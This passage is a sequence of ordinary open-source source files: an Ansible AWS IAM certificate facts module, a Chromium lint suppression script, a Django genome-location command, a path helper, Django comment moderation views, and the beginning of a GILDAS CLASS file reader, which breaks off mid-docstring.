# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Module maturity/support metadata consumed by Ansible's doc tooling.
ANSIBLE_METADATA = {'metadata_version': '1.0',
                    'status': ['preview'],
                    'supported_by': 'community'}
DOCUMENTATION = '''
---
module: iam_server_certificate_facts
short_description: Retrieve the facts of a server certificate
description:
- Retrieve the attributes of a server certificate
version_added: "2.2"
author: "Allen Sanabria (@linuxdynasty)"
requirements: [boto3, botocore]
options:
name:
description:
- The name of the server certificate you are retrieving attributes for.
required: true
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Retrieve server certificate
- iam_server_certificate_facts:
name: production-cert
register: server_cert
# Fail if the server certificate name was not found
- iam_server_certificate_facts:
name: production-cert
register: server_cert
failed_when: "{{ server_cert.results | length == 0 }}"
'''
RETURN = '''
server_certificate_id:
description: The 21 character certificate id
returned: success
type: str
sample: "ADWAJXWTZAXIPIMQHMJPO"
certificate_body:
description: The asn1der encoded PEM string
returned: success
type: str
sample: "-----BEGIN CERTIFICATE-----\nbunch of random data\n-----END CERTIFICATE-----"
server_certificate_name:
description: The name of the server certificate
returned: success
type: str
sample: "server-cert-name"
arn:
description: The Amazon resource name of the server certificate
returned: success
type: str
sample: "arn:aws:iam::911277865346:server-certificate/server-cert-name"
path:
description: The path of the server certificate
returned: success
type: str
sample: "/"
expiration:
description: The date and time this server certificate will expire, in ISO 8601 format.
returned: success
type: str
sample: "2017-06-15T12:00:00+00:00"
upload_date:
description: The date and time this server certificate was uploaded, in ISO 8601 format.
returned: success
type: str
sample: "2015-04-25T00:36:40+00:00"
'''
# Optional-dependency probe: the module fails gracefully at runtime (see
# main()) instead of crashing at import when boto3 is missing.
try:
    import boto3
    import botocore.exceptions
    HAS_BOTO3 = True
except ImportError:
    HAS_BOTO3 = False
def get_server_certs(iam, name=None):
    """Retrieve the attributes of a server certificate if it exists or all certs.
    Args:
        iam (botocore.client.IAM): The boto3 iam instance.
    Kwargs:
        name (str): The name of the server certificate.
    Basic Usage:
        >>> import boto3
        >>> iam = boto3.client('iam')
        >>> name = "server-cert-name"
        >>> results = get_server_certs(iam, name)
        {
            "upload_date": "2015-04-25T00:36:40+00:00",
            "server_certificate_id": "ADWAJXWTZAXIPIMQHMJPO",
            "certificate_body": "-----BEGIN CERTIFICATE-----\nbunch of random data\n-----END CERTIFICATE-----",
            "server_certificate_name": "server-cert-name",
            "expiration": "2017-06-15T12:00:00+00:00",
            "path": "/",
            "arn": "arn:aws:iam::911277865346:server-certificate/server-cert-name"
        }
    """
    results = dict()
    try:
        if name:
            server_certs = [iam.get_server_certificate(ServerCertificateName=name)['ServerCertificate']]
        else:
            # The list call returns only metadata; each cert body is fetched
            # individually below.
            server_certs = iam.list_server_certificates()['ServerCertificateMetadataList']
        for server_cert in server_certs:
            if not name:
                server_cert = iam.get_server_certificate(ServerCertificateName=server_cert['ServerCertificateName'])['ServerCertificate']
            cert_md = server_cert['ServerCertificateMetadata']
            results[cert_md['ServerCertificateName']] = {
                'certificate_body': server_cert['CertificateBody'],
                'server_certificate_id': cert_md['ServerCertificateId'],
                'server_certificate_name': cert_md['ServerCertificateName'],
                'arn': cert_md['Arn'],
                'path': cert_md['Path'],
                'expiration': cert_md['Expiration'].isoformat(),
                'upload_date': cert_md['UploadDate'].isoformat(),
            }
    except botocore.exceptions.ClientError:
        # Deliberate best-effort: a missing certificate yields an empty
        # result (documented in EXAMPLES) rather than a module failure.
        pass
    return results
def main():
    """Entry point: connect to IAM, gather certificate facts, exit."""
    argument_spec = ec2_argument_spec()
    argument_spec.update(dict(
        name=dict(type='str'),
    ))
    module = AnsibleModule(argument_spec=argument_spec,)
    if not HAS_BOTO3:
        module.fail_json(msg='boto3 required for this module')
    try:
        region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
        iam = boto3_conn(module, conn_type='client', resource='iam', region=region, endpoint=ec2_url, **aws_connect_kwargs)
    except botocore.exceptions.ClientError as e:
        # str(e) carries the AWS error code and message; the previous
        # ``e.msg`` does not exist on ClientError and raised AttributeError
        # inside this error path.
        module.fail_json(msg="Boto3 Client Error - " + str(e))
    cert_name = module.params.get('name')
    results = get_server_certs(iam, cert_name)
    module.exit_json(results=results)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
# Standard AnsiballZ entry point.
if __name__ == '__main__':
    main()
| gpl-3.0 |
TribeMedia/sky_engine | build/android/lint/suppress.py | 96 | 3912 | #!/usr/bin/env python
#
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Add all generated lint_result.xml files to suppressions.xml"""
import collections
import optparse
import os
import sys
from xml.dom import minidom
_BUILD_ANDROID_DIR = os.path.join(os.path.dirname(__file__), '..')
sys.path.append(_BUILD_ANDROID_DIR)
from pylib import constants
_THIS_FILE = os.path.abspath(__file__)
_CONFIG_PATH = os.path.join(os.path.dirname(_THIS_FILE), 'suppressions.xml')
_DOC = (
'\nSTOP! It looks like you want to suppress some lint errors:\n'
'- Have you tried identifing the offending patch?\n'
' Ask the author for a fix and/or revert the patch.\n'
'- It is preferred to add suppressions in the code instead of\n'
' sweeping it under the rug here. See:\n\n'
' http://developer.android.com/tools/debugging/improving-w-lint.html\n'
'\n'
'Still reading?\n'
'- You can edit this file manually to suppress an issue\n'
' globally if it is not applicable to the project.\n'
'- You can also automatically add issues found so for in the\n'
' build process by running:\n\n'
' ' + os.path.relpath(_THIS_FILE, constants.DIR_SOURCE_ROOT) + '\n\n'
' which will generate this file (Comments are not preserved).\n'
' Note: PRODUCT_DIR will be substituted at run-time with actual\n'
' directory path (e.g. out/Debug)\n'
)
_Issue = collections.namedtuple('Issue', ['severity', 'paths'])
def _ParseConfigFile(config_path):
  """Parse suppressions.xml into a dict of issue id -> _Issue."""
  print 'Parsing %s' % config_path
  issues_dict = {}
  dom = minidom.parse(config_path)
  for issue in dom.getElementsByTagName('issue'):
    issue_id = issue.attributes['id'].value
    severity = issue.getAttribute('severity')
    # Paths come from nested <ignore path="..."/> children.
    paths = set(
        [p.attributes['path'].value for p in
         issue.getElementsByTagName('ignore')])
    issues_dict[issue_id] = _Issue(severity, paths)
  return issues_dict
def _ParseAndMergeResultFile(result_path, issues_dict):
  """Merge a lint_result.xml report into issues_dict in place."""
  print 'Parsing and merging %s' % result_path
  dom = minidom.parse(result_path)
  for issue in dom.getElementsByTagName('issue'):
    issue_id = issue.attributes['id'].value
    severity = issue.attributes['severity'].value
    path = issue.getElementsByTagName('location')[0].attributes['file'].value
    if issue_id not in issues_dict:
      issues_dict[issue_id] = _Issue(severity, set())
    issues_dict[issue_id].paths.add(path)
def _WriteConfigFile(config_path, issues_dict):
  """Regenerate suppressions.xml from issues_dict (comments are replaced)."""
  new_dom = minidom.getDOMImplementation().createDocument(None, 'lint', None)
  top_element = new_dom.documentElement
  top_element.appendChild(new_dom.createComment(_DOC))
  # Sort for a stable, diff-friendly output.
  for issue_id in sorted(issues_dict.keys()):
    severity = issues_dict[issue_id].severity
    paths = issues_dict[issue_id].paths
    issue = new_dom.createElement('issue')
    issue.attributes['id'] = issue_id
    if severity:
      issue.attributes['severity'] = severity
    if severity == 'ignore':
      # A global severity=ignore drops every per-path <ignore> entry.
      print 'Warning: [%s] is suppressed globally.' % issue_id
    else:
      for path in sorted(paths):
        ignore = new_dom.createElement('ignore')
        ignore.attributes['path'] = path
        issue.appendChild(ignore)
    top_element.appendChild(issue)
  with open(config_path, 'w') as f:
    f.write(new_dom.toprettyxml(indent='  ', encoding='utf-8'))
  print 'Updated %s' % config_path
def _Suppress(config_path, result_path):
  # Read existing suppressions, fold in the new lint results, write back.
  issues_dict = _ParseConfigFile(config_path)
  _ParseAndMergeResultFile(result_path, issues_dict)
  _WriteConfigFile(config_path, issues_dict)
def main():
  """CLI entry: merge the given lint_result.xml into suppressions.xml."""
  parser = optparse.OptionParser(usage='%prog RESULT-FILE')
  _, args = parser.parse_args()
  if len(args) != 1 or not os.path.exists(args[0]):
    parser.error('Must provide RESULT-FILE')
  _Suppress(_CONFIG_PATH, args[0])

if __name__ == '__main__':
  main()
| bsd-3-clause |
RNAcentral/rnacentral-webcode | rnacentral/portal/management/commands/update_example_locations.py | 1 | 4551 | """
Copyright [2009-2017] EMBL-European Bioinformatics Institute
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
from django.core.management.base import BaseCommand
from portal.models import EnsemblAssembly
from portal.models import SequenceRegion
# Curated example genome-browser locations, keyed by Ensembl species URL
# name.  Each entry gives a chromosome/scaffold identifier plus start/end
# coordinates (presumably 1-based Ensembl coordinates -- TODO confirm
# against the browser code that consumes these values).
example_locations = {
    'homo_sapiens': {
        'chromosome': 'X',
        'start': 73819307,
        'end': 73856333,
    },
    'mus_musculus': {
        'chromosome': 1,
        'start': 86351908,
        'end': 86352200,
    },
    'danio_rerio': {
        'chromosome': 9,
        'start': 7633910,
        'end': 7634210,
    },
    'bos_taurus': {
        'chromosome': 15,
        'start': 82197673,
        'end': 82197837,
    },
    'rattus_norvegicus': {
        'chromosome': 'X',
        'start': 118277628,
        'end': 118277850,
    },
    'felis_catus': {
        'chromosome': 'X',
        'start': 18058223,
        'end': 18058546,
    },
    'macaca_mulatta': {
        'chromosome': 1,
        'start': 146238837,
        'end': 146238946,
    },
    'pan_troglodytes': {
        'chromosome': 11,
        'start': 78369004,
        'end': 78369219,
    },
    'canis_familiaris': {
        'chromosome': 19,
        'start': 22006909,
        'end': 22007119,
    },
    'gallus_gallus': {
        'chromosome': 9,
        'start': 15676031,
        'end': 15676160,
    },
    'xenopus_tropicalis': {
        'chromosome': 'NC_006839',
        'start': 11649,
        'end': 11717,
    },
    'saccharomyces_cerevisiae': {
        'chromosome': 'XII',
        'start': 856709,
        'end': 856919,
    },
    'schizosaccharomyces_pombe': {
        'chromosome': 'I',
        'start': 540951,
        'end': 544327,
    },
    'triticum_aestivum': {
        'chromosome': '6A',
        'start': 100656614,
        'end': 100656828,
    },
    'caenorhabditis_elegans': {
        'chromosome': 'III',
        'start': 11467363,
        'end': 11467705,
    },
    'drosophila_melanogaster': {
        'chromosome': '3R',
        'start': 7474331,
        'end': 7475217,
    },
    'bombyx_mori': {
        'chromosome': 'scaf16',
        'start': 6180018,
        'end': 6180422,
    },
    'anopheles_gambiae': {
        'chromosome': '2R',
        'start': 34644956,
        'end': 34645131,
    },
    'dictyostelium_discoideum': {
        'chromosome': 2,
        'start': 7874546,
        'end': 7876498,
    },
    'plasmodium_falciparum': {
        'chromosome': 13,
        'start': 2796339,
        'end': 2798488,
    },
    'arabidopsis_thaliana': {
        'chromosome': 2,
        'start': 18819643,
        'end': 18822629,
    }
}
def update_example_locations():
    """Set example genome locations on all Ensembl assemblies.

    For species with a curated entry in ``example_locations`` the curated
    coordinates are used; otherwise the first stored sequence region for
    the assembly (if any) is used as a fallback.  Assemblies with neither
    are reported and left unchanged.
    """
    # `.filter().all()` was redundant; `.all()` alone is equivalent.
    for assembly in EnsemblAssembly.objects.all():
        print(assembly.ensembl_url)
        # Look the species up once instead of four separate dict lookups.
        example = example_locations.get(assembly.ensembl_url)
        if example:
            assembly.example_chromosome = example['chromosome']
            assembly.example_start = example['start']
            assembly.example_end = example['end']
            assembly.save()
            continue
        try:
            region = SequenceRegion.objects.filter(assembly_id=assembly.assembly_id)[:1].get()
            assembly.example_chromosome = region.chromosome
            assembly.example_start = region.region_start
            assembly.example_end = region.region_stop
            print('\t', assembly.assembly_id, region.chromosome, region.region_start, region.region_stop)
            assembly.save()
        except SequenceRegion.DoesNotExist:
            print('No regions found {}'.format(assembly.ensembl_url))
        except SequenceRegion.MultipleObjectsReturned:
            print('Multiple assemblies found {}'.format(assembly.ensembl_url))
class Command(BaseCommand):
    """Management command updating assembly example locations.

    Usage:
    python manage.py update_example_locations
    """

    def handle(self, *args, **options):
        """Entry point invoked by Django's management framework."""
        update_example_locations()
| apache-2.0 |
gbiggs/rtshell | rtshell/path.py | 2 | 1105 | #!/usr/bin/env python2
# -*- Python -*-
# -*- coding: utf-8 -*-
'''rtshell
Copyright (C) 2009-2015
Geoffrey Biggs
RT-Synthesis Research Group
Intelligent Systems Research Institute,
National Institute of Advanced Industrial Science and Technology (AIST),
Japan
All rights reserved.
Licensed under the GNU Lesser General Public License version 3.
http://www.gnu.org/licenses/lgpl-3.0.en.html
Functions for dealing with input paths.
'''
import os
ENV_VAR='RTCSH_CWD'

def cmd_path_to_full_path(cmd_path):
    '''Given a path from the user, returns a suitable full path based on the
    value of the environment variable specified in ENV_VAR.

    Absolute paths (starting with '/') are returned unchanged.  Relative
    paths are joined to the working directory stored in the ENV_VAR
    environment variable; if that variable is unset or empty, the root
    directory '/' is used instead.
    '''
    if cmd_path.startswith('/'):
        # Already absolute; nothing to do.
        return cmd_path
    cwd = os.environ.get(ENV_VAR)
    if cwd:
        # BUG FIX: the old second condition `or cmd_path.startswith('/')`
        # was unreachable (handled by the early return above) and is gone.
        # Join with exactly one separator between the two components.
        if cwd.endswith('/'):
            return cwd + cmd_path
        return cwd + '/' + cmd_path
    # If ENV_VAR is not set, assume the current working dir is the root dir
    return '/' + cmd_path
# vim: tw=79
| lgpl-3.0 |
jamslevy/gsoc | app/django/contrib/comments/views/moderation.py | 15 | 6664 | from django import template
from django.conf import settings
from django.shortcuts import get_object_or_404, render_to_response
from django.contrib.auth.decorators import login_required, permission_required
from utils import next_redirect, confirmation_view
from django.core.paginator import Paginator, InvalidPage
from django.http import Http404
from django.contrib import comments
from django.contrib.comments import signals
#@login_required
def flag(request, comment_id, next=None):
    """
    Flags a comment. Confirmation on GET, action on POST.

    Templates: `comments/flag.html`,
    Context:
        comment
            the flagged `comments.comment` object
    """
    comment = get_object_or_404(comments.get_model(), pk=comment_id,
                                site__pk=settings.SITE_ID)

    # Anything other than POST renders the confirmation form.
    if request.method != 'POST':
        return render_to_response('comments/flag.html',
            {'comment': comment, "next": next},
            template.RequestContext(request)
        )

    # POST: record (or fetch) this user's "suggest removal" flag.
    flag, created = comments.models.CommentFlag.objects.get_or_create(
        comment=comment,
        user=request.user,
        flag=comments.models.CommentFlag.SUGGEST_REMOVAL,
    )
    signals.comment_was_flagged.send(
        sender=comment.__class__,
        comment=comment,
        flag=flag,
        created=created,
        request=request,
    )
    return next_redirect(request.POST.copy(), next, flag_done, c=comment.pk)
flag = login_required(flag)
#@permission_required("comments.delete_comment")
def delete(request, comment_id, next=None):
    """
    Deletes a comment. Confirmation on GET, action on POST. Requires the "can
    moderate comments" permission.

    Templates: `comments/delete.html`,
    Context:
        comment
            the flagged `comments.comment` object
    """
    comment = get_object_or_404(comments.get_model(), pk=comment_id,
                                site__pk=settings.SITE_ID)

    # Anything other than POST renders the confirmation form.
    if request.method != 'POST':
        return render_to_response('comments/delete.html',
            {'comment': comment, "next": next},
            template.RequestContext(request)
        )

    # POST: soft-delete -- flag the comment as deleted rather than
    # actually removing the row.
    flag, created = comments.models.CommentFlag.objects.get_or_create(
        comment=comment,
        user=request.user,
        flag=comments.models.CommentFlag.MODERATOR_DELETION,
    )
    comment.is_removed = True
    comment.save()
    signals.comment_was_flagged.send(
        sender=comment.__class__,
        comment=comment,
        flag=flag,
        created=created,
        request=request,
    )
    return next_redirect(request.POST.copy(), next, delete_done, c=comment.pk)
delete = permission_required("comments.can_moderate")(delete)
#@permission_required("comments.can_moderate")
def approve(request, comment_id, next=None):
    """
    Approve a comment (that is, mark it as public and non-removed). Confirmation
    on GET, action on POST. Requires the "can moderate comments" permission.

    Templates: `comments/approve.html`,
    Context:
        comment
            the `comments.comment` object for approval
    """
    comment = get_object_or_404(comments.get_model(), pk=comment_id,
                                site__pk=settings.SITE_ID)

    # Anything other than POST renders the confirmation form.
    if request.method != 'POST':
        return render_to_response('comments/approve.html',
            {'comment': comment, "next": next},
            template.RequestContext(request)
        )

    # POST: flag the comment as approved and make it publicly visible.
    flag, created = comments.models.CommentFlag.objects.get_or_create(
        comment=comment,
        user=request.user,
        flag=comments.models.CommentFlag.MODERATOR_APPROVAL,
    )
    comment.is_removed = False
    comment.is_public = True
    comment.save()
    signals.comment_was_flagged.send(
        sender=comment.__class__,
        comment=comment,
        flag=flag,
        created=created,
        request=request,
    )
    return next_redirect(request.POST.copy(), next, approve_done, c=comment.pk)
approve = permission_required("comments.can_moderate")(approve)
#@permission_required("comments.can_moderate")
def moderation_queue(request):
    """
    Displays a list of unapproved comments to be approved.

    Templates: `comments/moderation_queue.html`
    Context:
        comments
            Comments to be approved (paginated).
        empty
            Is the comment list empty?
        is_paginated
            Is there more than one page?
        results_per_page
            Number of comments per page
        has_next
            Is there a next page?
        has_previous
            Is there a previous page?
        page
            The current page number
        next
            The next page number
        pages
            Number of pages
        hits
            Total number of comments
        page_range
            Range of page numbers
    """
    # Single source of truth for the page size: the literal 100 used to be
    # duplicated in the Paginator call and the template context.
    results_per_page = 100
    qs = comments.get_model().objects.filter(is_public=False, is_removed=False)
    paginator = Paginator(qs, results_per_page)

    # Non-integer or out-of-range pages are a 404, not a server error.
    try:
        page = int(request.GET.get("page", 1))
    except ValueError:
        raise Http404
    try:
        comments_per_page = paginator.page(page)
    except InvalidPage:
        raise Http404

    return render_to_response("comments/moderation_queue.html", {
        'comments' : comments_per_page.object_list,
        'empty' : page == 1 and paginator.count == 0,
        'is_paginated': paginator.num_pages > 1,
        'results_per_page': results_per_page,
        'has_next': comments_per_page.has_next(),
        'has_previous': comments_per_page.has_previous(),
        'page': page,
        'next': page + 1,
        'previous': page - 1,
        'pages': paginator.num_pages,
        'hits' : paginator.count,
        'page_range' : paginator.page_range
    }, context_instance=template.RequestContext(request))
moderation_queue = permission_required("comments.can_moderate")(moderation_queue)
# Simple "success" confirmation pages, used as redirect targets by the
# moderation views once their POST action completes.
flag_done = confirmation_view(
    template = "comments/flagged.html",
    doc = 'Displays a "comment was flagged" success page.'
)
delete_done = confirmation_view(
    template = "comments/deleted.html",
    doc = 'Displays a "comment was deleted" success page.'
)
approve_done = confirmation_view(
    template = "comments/approved.html",
    doc = 'Displays a "comment was approved" success page.'
)
| apache-2.0 |
mikelum/pyspeckit | pyspeckit/spectrum/readers/read_class.py | 1 | 67070 | """
------------------------
GILDAS CLASS file reader
------------------------
Read a CLASS file into an :class:`pyspeckit.spectrum.ObsBlock`
"""
from __future__ import print_function
from astropy.extern.six.moves import xrange
from astropy.extern.six import iteritems
try:
import astropy.io.fits as pyfits
except ImportError:
import pyfits
import numpy
import numpy as np
from numpy import pi
from astropy import log
# from astropy.time import Time
from astropy import units as u
import pyspeckit
import sys
import re
try:
from astropy.utils.console import ProgressBar
except ImportError:
ProgressBar = lambda x: None
ProgressBar.update = lambda x: None
import struct
import time
# 'range' is needed as a keyword
irange = range
def print_timing(func):
    """
    Prints execution time of decorated function.

    Included here because CLASS files can take a little while to read;
    this should probably be replaced with a progressbar
    """
    def wrapper(*arg,**kwargs):
        t1 = time.time()
        res = func(*arg,**kwargs)
        t2 = time.time()
        # BUG FIX: `func.func_name` is Python-2-only; `__name__` exists on
        # both Python 2 and 3 function objects.
        log.info('%s took %0.5g s' % (func.__name__, (t2-t1)))
        return res
    wrapper.__doc__ = func.__doc__
    return wrapper
""" Specification: http://iram.fr/IRAMFR/GILDAS/doc/html/class-html/node58.html """
filetype_dict = {'1A ':'Multiple_IEEE','1 ':'Multiple_Vax','1B ':'Multiple_EEEI',
'2A ':'v2','2 ':'v2','2B ':'v2',
'9A ':'Single_IEEE','9 ':'Single_Vax','9B ':'Single_EEEI'}
fileversion_dict = {'1A ':'v1',
'2A ':'v2'}
record_lengths = {'1A': 512,
'2A': 1024*4}
header_id_numbers = {0: 'USER CODE',
-1: 'COMMENT',
-2: 'GENERAL',
-3: 'POSITION',
-4: 'SPECTRO',
-5: 'BASELINE',
-6: 'HISTORY',
# -8: 'SWITCH',
-10: 'DRIFT',
-14: 'CALIBRATION',
}
header_id_lengths = {-2: 9, # may really be 10?
-3: 17,
-4: 17,
-5: None, # variable length
-6: 3, # variable length
-14: 25,
}
# from packages/classic/lib/classic_mod.f90
filedescv2_nw1=14
"""
GENERAL
integer(kind=obsnum_length) :: num ! [ ] Observation number
integer(kind=4) :: ver ! [ ] Version number
integer(kind=4) :: teles(3) ! [ ] Telescope name
integer(kind=4) :: dobs ! [MJD-60549] Date of observation
integer(kind=4) :: dred ! [MJD-60549] Date of reduction
integer(kind=4) :: typec ! [ code] Type of coordinates
integer(kind=4) :: kind ! [ code] Type of data
integer(kind=4) :: qual ! [ code] Quality of data
integer(kind=4) :: subscan ! [ ] Subscan number
integer(kind=obsnum_length) :: scan ! [ ] Scan number
! Written in the entry
real(kind=8) :: ut ! 1-2 [ rad] UT of observation
real(kind=8) :: st ! 3-4 [ rad] LST of observation
real(kind=4) :: az ! 5 [ rad] Azimuth
real(kind=4) :: el ! 6 [ rad] Elevation
real(kind=4) :: tau ! 7 [neper] Opacity
real(kind=4) :: tsys ! 8 [ K] System temperature
real(kind=4) :: time ! 9 [ s] Integration time
! Not in this section in file
integer(kind=4) :: xunit ! [ code] X unit (if X coordinates section is present)
! NOT in data ---
character(len=12) :: cdobs ! [string] Duplicate of dobs
character(len=12) :: cdred ! [string] Duplicate of dred
"""
keys_lengths = {
'unknown': [
( 'NUM' ,1,'int32'), # Observation number
( 'VER' ,1,'int32'), # Version number
( 'TELES' ,3,'|S12') , # Telescope name
( 'DOBS' ,1,'int32'), # Date of observation
( 'DRED' ,1,'int32'), # Date of reduction
( 'TYPEC' ,1,'int32'), # Type of coordinates
( 'KIND' ,1,'int32'), # Type of data
( 'QUAL' ,1,'int32'), # Quality of data
( 'SCAN' ,1,'int32'), # Scan number
( 'SUBSCAN' ,1,'int32'), # Subscan number
],
'COMMENT': [ # -1
('LTEXT',1,'int32'), # integer(kind=4) :: ltext ! Length of comment
('CTEXT',1024/4,'|S1024'), # character ctext*1024 ! Comment string
],
'GENERAL': [ # -2
( 'UT' ,2,'float64'), # rad UT of observation
( 'ST' ,2,'float64'), # rad LST of observation
( 'AZ' ,1,'float32'), # rad Azimuth
( 'EL' ,1,'float32'), # rad Elevation
( 'TAU' ,1,'float32'), # neper Opacity
( 'TSYS' ,1,'float32'), # K System temperature
( 'TIME' ,1,'float32'), # s Integration time
# XUNIT should not be there?
#( 'XUNIT' ,1,'int32'), # code X unit (if xcoord_sec is present)
] ,
'POSITION': [ # -3
('SOURC',3,'|S12') , # [ ] Source name
('EPOCH',1,'float32'), # [ ] Epoch of coordinates
('LAM' ,2,'float64'), #[rad] Lambda
('BET' ,2,'float64'), #[rad] Beta
('LAMOF',1,'float32'), # [rad] Offset in Lambda
('BETOF',1,'float32'), # [rad] Offset in Beta
('PROJ' ,1,'int32') , # [rad] Projection system
('SL0P' ,1,'float64'), # lambda of descriptive system # MAY NOT EXIST IN OLD CLASS
('SB0P' ,1,'float64'), # beta of descriptive system # MAY NOT EXIST IN OLD CLASS
('SK0P' ,1,'float64'), # angle of descriptive system # MAY NOT EXIST IN OLD CLASS
],
'SPECTRO': [ # -4
#('align' ,1,'int32'), # [ ] Alignment padding
('LINE' ,3,'|S12'), # [ ] Line name
('RESTF' ,2,'float64'), # [ MHz] Rest frequency
('NCHAN' ,1,'int32'), # [ ] Number of channels
('RCHAN' ,1,'float32'), # [ ] Reference channels
('FRES' ,1,'float32'), # [ MHz] Frequency resolution
('FOFF' ,1,'float32'), # [ MHz] Frequency offset
('VRES' ,1,'float32'), # [km/s] Velocity resolution
('VOFF' ,1,'float32'), # [km/s] Velocity at reference channel
('BAD' ,1,'float32'), # [ ] Blanking value
#('ALIGN_1',1,'int32'), # [ ] Alignment padding
('IMAGE' ,2,'float64'), # [ MHz] Image frequency
#('ALIGN_2',1,'int32'), # [ ] Alignment padding
('VTYPE' ,1,'int32'), # [code] Type of velocity
('DOPPLER',2,'float64'), # [ ] Doppler factor = -V/c (CLASS convention)
],
'CALIBRATION': [ # -14
('ALIGN',1,'int32'), # BUFFER (it's a zero - it is not declared in the docs!!!!)
('BEEFF',1,'float32'), # [ ] Beam efficiency
('FOEFF',1,'float32'), # [ ] Forward efficiency
('GAINI',1,'float32'), # [ ] Image/Signal gain ratio
('H2OMM',1,'float32'), # [ mm] Water vapor content
('PAMB',1,'float32'), # [ hPa] Ambient pressure
('TAMB',1,'float32'), # [ K] Ambient temperature
('TATMS',1,'float32'), # [ K] Atmosphere temp. in signal band
('TCHOP',1,'float32'), # [ K] Chopper temperature
('TCOLD',1,'float32'), # [ K] Cold load temperature
('TAUS',1,'float32'), # [neper] Opacity in signal band
('TAUI',1,'float32'), # [neper] Opacity in image band
('TATMI',1,'float32'), # [ K] Atmosphere temp. in image band
('TREC',1,'float32'), # [ K] Receiver temperature
('CMODE',1,'int32'), # [ code] Calibration mode
('ATFAC',1,'float32'), # [ ] Applied calibration factor
('ALTI',1,'float32'), # [ m] Site elevation
('COUNT',3,'3float32'), # [count] Power of Atm., Chopp., Cold
('LCALOF',1,'float32'), # [ rad] Longitude offset for sky measurement
('BCALOF',1,'float32'), # [ rad] Latitude offset for sky measurement
('GEOLONG',1,'float64'), # [ rad] Geographic longitude of observatory # MAY NOT EXIST IN OLD CLASS
('GEOLAT',1,'float64'), # [ rad] Geographic latitude of observatory # MAY NOT EXIST IN OLD CLASS
],
'BASELINE':[
('DEG',1,'int32'), #! [ ] Degree of last baseline
('SIGFI',1,'float32'), #! [Int. unit] Sigma
('AIRE',1,'float32'), #! [Int. unit] Area under windows
('NWIND',1,'int32'), #! [ ] Number of line windows
# WARNING: These should probably have 'n', the second digit, = NWIND
# The docs are really unclear about this, they say "W1(MWIND)"
('W1MWIND',1,'float32'), #! [km/s] Lower limits of windows
('W2MWIND',1,'float32'), #! [km/s] Upper limits of windows
('SINUS',3,'float32'), #![] Sinus baseline results
],
'DRIFT':[ # 16?
('FREQ',1,'float64') , #! [ MHz] Rest frequency real(kind=8) ::
('WIDTH',1,'float32'), #! [ MHz] Bandwidth real(kind=4) ::
('NPOIN',1,'int32') , #! [ ] Number of data points integer(kind=4) ::
('RPOIN',1,'float32'), #! [ ] Reference point real(kind=4) ::
('TREF',1,'float32') , #! [ ?] Time at reference real(kind=4) ::
('AREF',1,'float32') , #! [ rad] Angular offset at ref. real(kind=4) ::
('APOS',1,'float32') , #! [ rad] Position angle of drift real(kind=4) ::
('TRES',1,'float32') , #! [ ?] Time resolution real(kind=4) ::
('ARES',1,'float32') , #! [ rad] Angular resolution real(kind=4) ::
('BAD',1,'float32') , #! [ ] Blanking value real(kind=4) ::
('CTYPE',1,'int32') , #! [code] Type of offsets integer(kind=4) ::
('CIMAG',1,'float64'), #! [ MHz] Image frequency real(kind=8) ::
('COLLA',1,'float32'), #! [ ?] Collimation error Az real(kind=4) ::
('COLLE',1,'float32'), #! [ ?] Collimation error El real(kind=4) ::
],
}
def _read_bytes(f, n):
    '''Return the next `n` bytes of file-like object `f` (from idlsave)'''
    data = f.read(n)
    return data
"""
Warning: UNCLEAR what endianness should be!
Numpy seemed to get it right, and I think numpy assumes NATIVE endianness
"""
def _read_byte(f):
    '''Read a single byte (from idlsave); consumes a whole 4-byte word.'''
    word = f.read(4)
    (value,) = struct.unpack('=B', word[:1])
    return numpy.uint8(value)
def _read_int16(f):
    '''Read a signed 16-bit integer (from idlsave); consumes a 4-byte
    word and decodes only its last two bytes.'''
    word = f.read(4)
    (value,) = struct.unpack('=h', word[2:4])
    return numpy.int16(value)
def _read_int32(f):
    '''Read a signed 32-bit integer (from idlsave)'''
    raw = f.read(4)
    (value,) = struct.unpack('=i', raw)
    return numpy.int32(value)
def _read_int64(f):
    '''Read a signed 64-bit integer '''
    raw = f.read(8)
    (value,) = struct.unpack('=q', raw)
    return numpy.int64(value)
def _read_float32(f):
    '''Read a 32-bit float (from idlsave)'''
    raw = f.read(4)
    (value,) = struct.unpack('=f', raw)
    return numpy.float32(value)
def _align_32(f):
    '''Advance `f` to the next 32-bit (4-byte) boundary (from idlsave)'''
    pos = f.tell()
    remainder = pos % 4
    if remainder:
        f.seek(pos + 4 - remainder)
    return
def _read_word(f,length):
    '''Read `length` bytes from `f`, then realign the file position to the
    next 32-bit boundary.  Returns None when `length` is not positive.'''
    if length <= 0:
        return None
    chars = f.read(length)
    # Realign to a 4-byte boundary (inlined _align_32).
    pos = f.tell()
    if pos % 4 != 0:
        f.seek(pos + 4 - pos % 4)
    return chars
def _read_int(f):
    '''Read one native int from `f`.  NOTE: unlike the other readers this
    returns the raw 1-tuple produced by struct.unpack.'''
    raw = f.read(4)
    return struct.unpack('i', raw)
def is_ascii(s):
    """Return True when `s` decodes (bytes) / encodes (unicode) cleanly
    as ASCII, False otherwise."""
    try:
        s.decode('ascii')
    except UnicodeDecodeError:
        return False
    except UnicodeEncodeError:
        return False
    return True
def is_all_null(s):
    # True iff every element of `s` equals the NUL character (vacuously
    # True for an empty sequence).
    return not any(ch != '\x00' for ch in s)
"""
from clic_file.f90: v1, v2
integer(kind=4) :: bloc ! 1 : observation address [records] integer(kind=8) :: bloc ! 1- 2: observation address [records] integer(kind=4) :: bloc ! 1 : block read from index
integer(kind=4) :: num ! 2 : observation number integer(kind=4) :: word ! 3 : address offset [4-bytes] integer(kind=4) :: num ! 2 : number read
integer(kind=4) :: ver ! 3 : observation version integer(kind=4) :: ver ! 4 : observation version integer(kind=4) :: ver ! 3 : version read from index
